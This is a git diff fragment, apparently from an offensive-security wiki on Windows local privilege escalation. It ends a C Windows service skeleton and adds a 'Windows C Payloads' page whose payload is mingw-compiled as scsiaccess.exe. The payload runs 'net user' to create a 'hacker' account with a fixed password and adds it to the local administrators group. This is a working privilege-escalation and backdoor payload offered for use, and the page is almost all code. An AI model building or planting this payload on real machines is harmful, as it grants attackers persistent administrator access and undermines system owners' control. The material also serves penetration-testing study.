+							0, 0, 0, 0, 0 );
+			if ( service )
+				CloseServiceHandle( service );
+		}
+		CloseServiceHandle( serviceControlManager );
+	}
+}
+
+void UninstallService() {
+	SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );
+
+	if ( serviceControlManager ) {
+		SC_HANDLE service = OpenService( serviceControlManager,
+			serviceName, SERVICE_QUERY_STATUS | DELETE );
+		if ( service ) {
+			SERVICE_STATUS serviceStatus;
+			if ( QueryServiceStatus( service, &serviceStatus ) ) {
+				if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )
+					DeleteService( service );
+			}
+			CloseServiceHandle( service );
+		}
+		CloseServiceHandle( serviceControlManager );
+	}
+}
+
+int _tmain( int argc, TCHAR* argv[] )
+{
+	if ( argc > 1 && lstrcmpi( argv[1], TEXT("install") ) == 0 ) {
+		InstallService();
+	}
+	else if ( argc > 1 && lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {
+		UninstallService();
+	}
+	else  {
+		SERVICE_TABLE_ENTRY serviceTable[] = {
+			{ serviceName, ServiceMain },
+			{ 0, 0 }
+		};
+	
+		StartServiceCtrlDispatcher( serviceTable );
+	}	
+
+	return 0;
+}
+```
+
+**The code of this example was shared by an anonymous person.**
+
diff --git a/windows/windows-local-privilege-escalation/windows-c-payloads.md b/windows/windows-local-privilege-escalation/windows-c-payloads.md
new file mode 100644
index 00000000..0e2c81ee
--- /dev/null
+++ b/windows/windows-local-privilege-escalation/windows-c-payloads.md
@@ -0,0 +1,16 @@
+# Windows C Payloads
+
+## Add user
+
+```text
+#i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
+#include <stdlib.h> /* system, NULL, EXIT_FAILURE */  
+int main ()  
+{  
+    int i;
+    system("net user hacker Hacker123! /add");
+    system("net localgroup administrators hacker /add");  
+    return 0;  
+}
+```
+